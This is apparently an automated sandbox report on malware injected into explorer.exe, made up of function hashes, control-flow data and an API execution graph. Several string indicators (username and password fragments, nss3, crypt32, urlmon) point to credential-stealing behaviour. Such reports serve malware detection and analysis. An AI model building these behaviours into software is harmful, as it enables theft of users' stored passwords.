                                                                  control_flow_graph 286 5aa64b2-5aa64e6 287 5aa64e9-5aa64ed 286->287 288 5aa6569-5aa6572 287->288 289 5aa64ef-5aa64f2 287->289 288->287 290 5aa6578-5aa6581 288->290 289->288 291 5aa64f4-5aa6514 call 5aa8342 289->291 292 5aa65ba-5aa65d6 290->292 293 5aa6583-5aa658a 290->293 300 5aa651f-5aa655f call 5aa74f2 291->300 301 5aa651a call 5aa8312 291->301 295 5aa659f-5aa65a8 293->295 296 5aa658c-5aa658d 293->296 295->292 299 5aa65aa-5aa65b1 295->299 298 5aa6593-5aa659d 296->298 298->295 298->298 299->292 302 5aa65b3-5aa65b4 299->302 300->288 305 5aa6561-5aa6567 SleepEx 300->305 301->300 302->292 305->288
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: afa6d07527846fbb1122b3884d939f329e186663819791bdf139398d76f10f5b
                                                                  • Instruction ID: 1c7bd68d1bd1a50f823ec219c5375ec7c3e1293deb4feef8856779a8194a3e96
                                                                  • Opcode Fuzzy Hash: afa6d07527846fbb1122b3884d939f329e186663819791bdf139398d76f10f5b
                                                                  • Instruction Fuzzy Hash: 5031F73261CB4DCFCB29DF18D9859E9B3E0FB85710F04065ED49B87119DB70A942CAD2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA64AB Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 306 5aa64ab-5aa64ac 307 5aa64ae-5aa64b1 306->307 308 5aa650d-5aa651a call 5aa8312 306->308 307->308 310 5aa651f-5aa655f call 5aa74f2 308->310 313 5aa6569-5aa6572 310->313 314 5aa6561-5aa6567 SleepEx 310->314 315 5aa6578-5aa6581 313->315 316 5aa64e9-5aa64ed 313->316 314->313 317 5aa65ba-5aa65d6 315->317 318 5aa6583-5aa658a 315->318 316->313 319 5aa64ef-5aa64f2 316->319 320 5aa659f-5aa65a8 318->320 321 5aa658c-5aa658d 318->321 319->313 322 5aa64f4-5aa6514 call 5aa8342 319->322 320->317 325 5aa65aa-5aa65b1 320->325 323 5aa6593-5aa659d 321->323 322->310 328 5aa651a call 5aa8312 322->328 323->320 323->323 325->317 327 5aa65b3-5aa65b4 325->327 327->317 328->310
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 6b769b170b1a8b9684fe2bf6667aca27b47b5c3d285ca0adb756b6e6030b14e7
                                                                  • Instruction ID: fc03037d94a632e4b6903b6fb144f0b0a99c27adb2b26c0b1b665574fbb478ab
                                                                  • Opcode Fuzzy Hash: 6b769b170b1a8b9684fe2bf6667aca27b47b5c3d285ca0adb756b6e6030b14e7
                                                                  • Instruction Fuzzy Hash: 9221E43261CB498FCB39DF18E9859ED73D1F784710F44066ED5CB87156EB34A8438A86
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05A9F692 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 9fb2356148101aa9420ae4aad7d72730ff3cfb8bd9b520b9a3e7d6278ce6f5f3
                                                                  • Instruction ID: 2fb04dd7c213b2003da0d840fbb10a50007fae95838bb7b01f5407713c20ab56
                                                                  • Opcode Fuzzy Hash: 9fb2356148101aa9420ae4aad7d72730ff3cfb8bd9b520b9a3e7d6278ce6f5f3
                                                                  • Instruction Fuzzy Hash: 8FF08130718A484FDB88EF6CD48496AB3E1EF98200F444A3EA95EC7264EA35C5818752
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 0E0F0290 Relevance: 11.7, Strings: 9, Instructions: 406COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .dll$32.d$K;y&$M$S$el32$kern$ll$user
                                                                  • API String ID: 0-2102913938
                                                                  • Opcode ID: c967ba98aa6818e9a7e8a5f096327c9b61f3f12a1156fda78f7e771b66dbc61a
                                                                  • Instruction ID: 2235e7e15b5b9efedcbac9d5d13b3a27c6ca2a802cc226257bff3ab2f6ee2442
                                                                  • Opcode Fuzzy Hash: c967ba98aa6818e9a7e8a5f096327c9b61f3f12a1156fda78f7e771b66dbc61a
                                                                  • Instruction Fuzzy Hash: 28E17D70618A499FCB59EF78C494BEAF3E1FF98301F404A2AD15EC7644DF34A9608B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0E0F49A2 Relevance: 56.5, Strings: 45, Instructions: 209COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                  • API String ID: 0-3558027158
                                                                  • Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                  • Instruction ID: 9e4bca67a5e41abcdaa655b2cf4502e9736654ff98085f8f98468e0138b5a0cc
                                                                  • Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                  • Instruction Fuzzy Hash: 54914EF04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89558B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0E0F1E72 Relevance: 9.0, Strings: 7, Instructions: 292COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                  • API String ID: 0-2058692283
                                                                  • Opcode ID: 75c8884196013b17c768361e1995a5fa7aa5762a9df6beb0c95d7ae7f7b5ba93
                                                                  • Instruction ID: 91f4843fc8134f1eaf76b5c55f2f0cafdc85db5c3b3d285e3c2450b5d9c2660e
                                                                  • Opcode Fuzzy Hash: 75c8884196013b17c768361e1995a5fa7aa5762a9df6beb0c95d7ae7f7b5ba93
                                                                  • Instruction Fuzzy Hash: 5591BE70A18748CBDB18EFA8D4446EEB7F2FF98300F404A2ED58AD7251DF7089958789
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0E0F0C02 Relevance: 7.7, Strings: 6, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: U$b$d$k$n$o
                                                                  • API String ID: 0-1739295752
                                                                  • Opcode ID: c154e42e4e2377762541633edb31a1727a8ce2a1e2ea00f45db5444f4b9afd32
                                                                  • Instruction ID: ed611fa555c12fdf87f9c2ad196aabf7043f8aa7a7c85737c6225912ab9c79bc
                                                                  • Opcode Fuzzy Hash: c154e42e4e2377762541633edb31a1727a8ce2a1e2ea00f45db5444f4b9afd32
                                                                  • Instruction Fuzzy Hash: CB516E30A14A0D9BCB48EFA4D8847EEB3E1FF54301F408629C55AD7251EF34AA648BD6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0E0F21D7 Relevance: 6.5, Strings: 5, Instructions: 207COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .dll$cryp$dll$nss3$t32.
                                                                  • API String ID: 0-1478216402
                                                                  • Opcode ID: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
                                                                  • Instruction ID: 75fca8f35f0dde185a9f2cd9527c54266f3c9443f7917e982e9671c103b35f96
                                                                  • Opcode Fuzzy Hash: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
                                                                  • Instruction Fuzzy Hash: 9C615D30618B09CFDB58EF68C0587DAB7E2FF58300F40462AD91AC76A4DB74A964C7C5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0E0F21D2 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .dll$cryp$dll$nss3$t32.
                                                                  • API String ID: 0-1478216402
                                                                  • Opcode ID: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
                                                                  • Instruction ID: 6b348f926dede32a53fd44b8323a56b647f408ec62b9b69446dd56b44825a354
                                                                  • Opcode Fuzzy Hash: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
                                                                  • Instruction Fuzzy Hash: 5F615C30618B09CFDB58EF68C0587DAB7E2FF58300F40862AD51AC7694DB74A964C7C5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0E0EF7DE Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                  • API String ID: 0-1970020201
                                                                  • Opcode ID: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
                                                                  • Instruction ID: 0e1292515c2e0dd0bbc18b5f651da8d250849ce5bdb48f685ae2f4638802e462
                                                                  • Opcode Fuzzy Hash: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
                                                                  • Instruction Fuzzy Hash: 84617B70A14B488FCB54EFA4D044AEEB7F1FF58300F404A2ED89AE7614EF3099519B86
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0E0EF7E2 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                  • API String ID: 0-1970020201
                                                                  • Opcode ID: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
                                                                  • Instruction ID: 2e30899455a7365a60d4641206c87719b9f823a433c0cb9ef2bd8f1daf82d3cf
                                                                  • Opcode Fuzzy Hash: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
                                                                  • Instruction Fuzzy Hash: 80616B70A14B488FDB54EFA4D0446EEB7F1FF58300F404A2ED89AE7654EF3099519B86
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0E0F2472 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: -Age$User$nt: $on.d$urlm
                                                                  • API String ID: 0-1987325725
                                                                  • Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                  • Instruction ID: c597667daa9a9ac3b35e857d759b0ae72107708023c535490235f1653440aa17
                                                                  • Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                  • Instruction Fuzzy Hash: 1A31F131B10A4C8FCF44EFA8D8942EEB7E1FF98645F40462AD54ED7240EF788A448785
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0E0F0002 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .dll$el32$h$kern
                                                                  • API String ID: 0-4264704552
                                                                  • Opcode ID: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
                                                                  • Instruction ID: 86e0083f4755f19689e73ac2371498dc43d98c75e2e25e33dbdc54f08b257592
                                                                  • Opcode Fuzzy Hash: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
                                                                  • Instruction Fuzzy Hash: 69418270608B488FD7A8DF68C4943AAB7E1FB98301F144A3ED59AC3655DF70C995CB41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:7.6%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:2.1%
                                                                  Total number of Nodes:1087
                                                                  Total number of Limit Nodes:133
                                                                  execution_graph 30278 629720 30279 629745 30278->30279 30284 62b160 30279->30284 30283 62979d 30285 62b184 30284->30285 30286 62b1c0 LdrLoadDll 30285->30286 30287 629778 30285->30287 30286->30287 30287->30283 30288 62ccf0 30287->30288 30289 62cd1c 30288->30289 30299 63c5e0 30289->30299 30292 62cd3c 30292->30283 30296 62cd77 30310 63c890 30296->30310 30298 62cd9a 30298->30283 30313 63d3d0 30299->30313 30301 62cd35 30301->30292 30302 63c620 30301->30302 30303 63d3d0 LdrLoadDll 30302->30303 30304 63c63c 30303->30304 30323 4559710 LdrInitializeThunk 30304->30323 30305 62cd5f 30305->30292 30307 63cc10 30305->30307 30308 63cc2f 30307->30308 30309 63d3d0 LdrLoadDll 30307->30309 30308->30296 30309->30308 30311 63c8ac NtClose 30310->30311 30312 63d3d0 LdrLoadDll 30310->30312 30311->30298 30312->30311 30314 63d455 30313->30314 30315 63d3df 30313->30315 30314->30301 30315->30314 30317 637780 30315->30317 30318 63779a 30317->30318 30319 63778e 30317->30319 30318->30314 30319->30318 30322 637c00 LdrLoadDll 30319->30322 30321 6378ec 30321->30314 30322->30321 30323->30305 30324 63dea0 30325 63dec6 30324->30325 30332 62a0f0 30325->30332 30327 63ded2 30328 63df00 30327->30328 30340 629100 30327->30340 30372 63cab0 LdrLoadDll 30328->30372 30331 63df11 30373 62a040 30332->30373 30334 62a0fd 30335 62a104 30334->30335 30385 629fe0 30334->30385 30335->30327 30341 629127 30340->30341 30825 62b630 30341->30825 30343 629139 30829 62b380 30343->30829 30345 62916e 30351 629175 30345->30351 30872 62b2b0 LdrLoadDll 30345->30872 30348 6291e5 30349 63e3e0 LdrLoadDll 30348->30349 30370 62942d 30348->30370 30350 6291fb 30349->30350 30352 63e3e0 LdrLoadDll 30350->30352 30351->30370 30833 62e2d0 30351->30833 30353 62920c 30352->30353 30354 63e3e0 LdrLoadDll 30353->30354 30355 62921a 30354->30355 30845 62c870 30355->30845 30357 629227 30358 637370 9 API calls 30357->30358 30359 629238 30358->30359 30360 637370 9 API calls 30359->30360 30361 629249 30360->30361 30362 62926d 30361->30362 30363 637370 9 API calls 30361->30363 30364 637370 9 API calls 30362->30364 30371 6292b5 30362->30371 30365 629266 30363->30365 30367 629284 30364->30367 30873 62c9c0 LdrLoadDll 30365->30873 30367->30371 30874 62d360 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 30367->30874 30370->30328 30371->30370 30857 628d80 30371->30857 30372->30331 30404 63b030 30373->30404 30377 62a066 30377->30334 30378 62a05c 30378->30377 30411 63d750 30378->30411 30380 62a0a3 30380->30377 30422 629e80 30380->30422 30382 62a0c3 30428 6298e0 LdrLoadDll 30382->30428 30384 62a0d5 30384->30334 30807 63da40 30385->30807 30388 63da40 LdrLoadDll 30389 62a011 30388->30389 30390 63da40 LdrLoadDll 30389->30390 30391 62a02a 30390->30391 30392 62e090 30391->30392 30393 62e0a9 30392->30393 30811 62b4b0 30393->30811 30395 62e0bc 30396 63c5e0 LdrLoadDll 30395->30396 30397 62e0cb 30396->30397 30398 62a115 30397->30398 30815 63cbd0 30397->30815 30398->30327 30400 62e0e2 30401 62e10d 30400->30401 30818 63c660 30400->30818 30403 63c890 2 API calls 30401->30403 30403->30398 30405 63b03f 30404->30405 30406 637780 LdrLoadDll 30405->30406 30407 62a053 30406->30407 30408 63aef0 30407->30408 30429 63ca00 30408->30429 30412 63d769 30411->30412 30432 637370 30412->30432 30414 63d781 30415 63d78a 30414->30415 30471 63d590 30414->30471 30415->30380 30417 63d79e 30417->30415 30488 63c300 30417->30488 30420 63d7d2 30493 63e300 30420->30493 30425 629e9a 30422->30425 30785 627670 30422->30785 30424 629ea1 30424->30382 30425->30424 30798 627930 30425->30798 30428->30384 30430 63af05 30429->30430 30431 63d3d0 LdrLoadDll 30429->30431 30430->30378 30431->30430 30433 6376b3 30432->30433 30435 637384 30432->30435 30433->30414 30435->30433 30496 63c050 30435->30496 30437 6374b5 30502 63c760 30437->30502 30438 637498 30499 63c860 30438->30499 30441 6374dc 30443 63e300 2 API calls 30441->30443 30442 6374a2 30442->30414 30446 6374e8 30443->30446 30444 637677 30447 63c890 2 API calls 30444->30447 30445 63768d 30559 637090 30445->30559 30446->30442 30446->30444 30446->30445 30451 637580 30446->30451 30448 63767e 30447->30448 30448->30414 30450 6376a0 30450->30414 30452 6375e7 30451->30452 30454 63758f 30451->30454 30452->30444 30453 6375fa 30452->30453 30598 63c6e0 30453->30598 30456 637594 30454->30456 30457 6375a8 30454->30457 30597 636f50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 30456->30597 30459 6375c5 30457->30459 30460 6375ad 30457->30460 30459->30448 30517 636d10 30459->30517 30505 636ff0 30460->30505 30462 63759e 30462->30414 30465 63765a 30468 63c890 2 API calls 30465->30468 30466 6375bb 30466->30414 30470 637666 30468->30470 30469 6375dd 30469->30414 30470->30414 30472 63d5ab 30471->30472 30473 63d5bd 30472->30473 30625 63e280 30472->30625 30473->30417 30475 63d5dd 30628 636970 30475->30628 30477 63d600 30477->30473 30478 636970 2 API calls 30477->30478 30480 63d622 30478->30480 30480->30473 30660 637cd0 30480->30660 30481 63d6aa 30482 63d6ba 30481->30482 30755 63d350 LdrLoadDll 30481->30755 30671 63d1c0 30482->30671 30485 63d6e8 30750 63c2c0 30485->30750 30487 63d712 30487->30417 30489 63c31c 30488->30489 30490 63d3d0 LdrLoadDll 30488->30490 30779 455967a 30489->30779 30490->30489 30491 63c337 30491->30420 30494 63d7fc 30493->30494 30782 63ca70 30493->30782 30494->30380 30497 637469 30496->30497 30498 63d3d0 LdrLoadDll 30496->30498 30497->30437 30497->30438 30497->30442 30498->30497 30500 63d3d0 LdrLoadDll 30499->30500 30501 63c87c NtDeleteFile 30500->30501 30501->30442 30503 63d3d0 LdrLoadDll 30502->30503 30504 63c77c NtCreateFile 30503->30504 30504->30441 30506 63700c 30505->30506 30507 63702d 30506->30507 30508 63c6e0 LdrLoadDll 30506->30508 30509 637034 30507->30509 30510 637048 30507->30510 30508->30507 30512 63c890 2 API calls 30509->30512 30511 63c890 2 API calls 30510->30511 30513 637051 30511->30513 30514 63703d 30512->30514 30602 63e420 LdrLoadDll 30513->30602 30514->30466 30516 63705c 30516->30466 30518 636d5b 30517->30518 30519 636d8e 30517->30519 30520 63c6e0 LdrLoadDll 30518->30520 30521 636ed6 30519->30521 30525 636daa 30519->30525 30522 636d76 30520->30522 30523 63c6e0 LdrLoadDll 30521->30523 30524 63c890 2 API calls 30522->30524 30532 636ef1 30523->30532 30526 636d7f 30524->30526 30527 63c6e0 LdrLoadDll 30525->30527 30526->30469 30528 636dc5 30527->30528 30530 636de1 30528->30530 30531 636dcc 30528->30531 30535 636de6 30530->30535 30536 636dfc 30530->30536 30534 63c890 2 API calls 30531->30534 30615 63c720 LdrLoadDll 30532->30615 30533 636f2b 30537 63c890 2 API calls 30533->30537 30538 636dd5 30534->30538 30539 63c890 2 API calls 30535->30539 30540 636e01 30536->30540 30611 63e3e0 30536->30611 30541 636f36 30537->30541 30538->30469 30542 636def 30539->30542 30543 636e10 30540->30543 30603 63c810 30540->30603 30541->30469 30542->30469 30543->30469 30546 636e7b 30549 636e82 30546->30549 30550 636e97 30546->30550 30547 636e64 30547->30546 30614 63c6a0 LdrLoadDll 30547->30614 30551 63c890 2 API calls 30549->30551 30552 63c890 2 API calls 30550->30552 30551->30543 30553 636ea0 30552->30553 30554 636ecc 30553->30554 30606 63e100 30553->30606 30554->30469 30556 636eb7 30557 63e300 2 API calls 30556->30557 30558 636ec0 30557->30558 30558->30469 30560 6370ce 30559->30560 30561 63c6e0 LdrLoadDll 30559->30561 30562 6370d7 30560->30562 30563 6370ec 30560->30563 30561->30560 30564 63c890 2 API calls 30562->30564 30565 637110 30563->30565 30566 63715a 30563->30566 30578 6370e0 30564->30578 30567 63c7c0 2 API calls 30565->30567 30568 6371a0 30566->30568 30569 63715f 30566->30569 30570 637135 30567->30570 30571 6371b2 30568->30571 30577 637327 30568->30577 30573 63c810 2 API calls 30569->30573 30569->30578 30572 63c890 2 API calls 30570->30572 30574 6371b7 30571->30574 30584 6371f2 30571->30584 30572->30578 30575 63718a 30573->30575 30576 63c7c0 2 API calls 30574->30576 30579 63c890 2 API calls 30575->30579 30580 6371da 30576->30580 30577->30578 30581 63c890 2 API calls 30577->30581 30578->30450 30582 637193 30579->30582 30585 63c890 2 API calls 30580->30585 30586 637358 30581->30586 30582->30450 30583 6371f7 30583->30578 30588 63c7c0 2 API calls 30583->30588 30584->30583 30592 6372d0 30584->30592 30587 6371e3 30585->30587 30586->30450 30587->30450 30589 637217 30588->30589 30590 63c890 2 API calls 30589->30590 30591 637222 30590->30591 30591->30450 30592->30578 30619 63c7c0 30592->30619 30595 63c890 2 API calls 30596 637318 30595->30596 30596->30450 30597->30462 30599 63d3d0 LdrLoadDll 30598->30599 30600 637642 30599->30600 30601 63c720 LdrLoadDll 30600->30601 30601->30465 30602->30516 30604 63c82c NtReadFile 30603->30604 30605 63d3d0 LdrLoadDll 30603->30605 30604->30547 30605->30604 30607 63e124 30606->30607 30608 63e10d 30606->30608 30607->30556 30608->30607 30609 63e3e0 LdrLoadDll 30608->30609 30610 63e13b 30609->30610 30610->30556 30616 63ca30 30611->30616 30613 63e3f8 30613->30540 30614->30546 30615->30533 30617 63d3d0 LdrLoadDll 30616->30617 30618 63ca4c 30617->30618 30618->30613 30620 63d3d0 LdrLoadDll 30619->30620 30621 63c7dc 30620->30621 30624 4559560 LdrInitializeThunk 30621->30624 30622 63730f 30622->30595 30624->30622 30626 63e2ad 30625->30626 30756 63c940 LdrLoadDll 30625->30756 30626->30475 30629 636981 30628->30629 30630 636989 30628->30630 30629->30477 30659 636c5c 30630->30659 30757 63f480 30630->30757 30632 6369dd 30633 63f480 LdrLoadDll 30632->30633 30636 6369e8 30633->30636 30634 636a36 30637 63f480 LdrLoadDll 30634->30637 30636->30634 30638 63f5b0 2 API calls 30636->30638 30771 63f520 LdrLoadDll RtlFreeHeap 30636->30771 30640 636a4a 30637->30640 30638->30636 30639 636aa7 30641 63f480 LdrLoadDll 30639->30641 30640->30639 30762 63f5b0 30640->30762 30642 636abd 30641->30642 30644 636afa 30642->30644 30646 63f5b0 2 API calls 30642->30646 30645 63f480 LdrLoadDll 30644->30645 30647 636b05 30645->30647 30646->30642 30648 63f5b0 2 API calls 30647->30648 30654 636b3f 30647->30654 30648->30647 30651 63f4e0 2 API calls 30652 636c3e 30651->30652 30653 63f4e0 2 API calls 30652->30653 30655 636c48 30653->30655 30768 63f4e0 30654->30768 30656 63f4e0 2 API calls 30655->30656 30657 636c52 30656->30657 30658 63f4e0 2 API calls 30657->30658 30658->30659 30659->30477 30661 637ce1 30660->30661 30662 637370 9 API calls 30661->30662 30664 637cf7 30662->30664 30663 637d00 30663->30481 30664->30663 30665 637d37 30664->30665 30668 637d83 30664->30668 30666 63e300 2 API calls 30665->30666 30667 637d48 30666->30667 30667->30481 30669 63e300 2 API calls 30668->30669 30670 637d88 30669->30670 30670->30481 30772 63d050 30671->30772 30673 63d1d4 30674 63d050 LdrLoadDll 30673->30674 30675 63d1dd 30674->30675 30676 63d050 LdrLoadDll 30675->30676 30677 63d1e6 30676->30677 30678 63d050 LdrLoadDll 30677->30678 30679 63d1ef 30678->30679 30680 63d050 LdrLoadDll 30679->30680 30681 63d1f8 30680->30681 30682 63d050 LdrLoadDll 30681->30682 30683 63d201 30682->30683 30684 63d050 LdrLoadDll 30683->30684 30685 63d20d 30684->30685 30686 63d050 LdrLoadDll 30685->30686 30687 63d216 30686->30687 30688 63d050 LdrLoadDll 30687->30688 30689 63d21f 30688->30689 30690 63d050 LdrLoadDll 30689->30690 30691 63d228 30690->30691 30692 63d050 LdrLoadDll 30691->30692 30693 63d231 30692->30693 30694 63d050 LdrLoadDll 30693->30694 30695 63d23a 30694->30695 30696 63d050 LdrLoadDll 30695->30696 30697 63d246 30696->30697 30698 63d050 LdrLoadDll 30697->30698 30699 63d24f 30698->30699 30700 63d050 LdrLoadDll 30699->30700 30701 63d258 30700->30701 30702 63d050 LdrLoadDll 30701->30702 30703 63d261 30702->30703 30704 63d050 LdrLoadDll 30703->30704 30705 63d26a 30704->30705 30706 63d050 LdrLoadDll 30705->30706 30707 63d273 30706->30707 30708 63d050 LdrLoadDll 30707->30708 30709 63d27f 30708->30709 30710 63d050 LdrLoadDll 30709->30710 30711 63d288 30710->30711 30712 63d050 LdrLoadDll 30711->30712 30713 63d291 30712->30713 30714 63d050 LdrLoadDll 30713->30714 30715 63d29a 30714->30715 30716 63d050 LdrLoadDll 30715->30716 30717 63d2a3 30716->30717 30718 63d050 LdrLoadDll 30717->30718 30719 63d2ac 30718->30719 30720 63d050 LdrLoadDll 30719->30720 30721 63d2b8 30720->30721 30722 63d050 LdrLoadDll 30721->30722 30723 63d2c1 30722->30723 30724 63d050 LdrLoadDll 30723->30724 30725 63d2ca 30724->30725 30726 63d050 LdrLoadDll 30725->30726 30727 63d2d3 30726->30727 30728 63d050 LdrLoadDll 30727->30728 30729 63d2dc 30728->30729 30730 63d050 LdrLoadDll 30729->30730 30731 63d2e5 30730->30731 30732 63d050 LdrLoadDll 30731->30732 30733 63d2f1 30732->30733 30734 63d050 LdrLoadDll 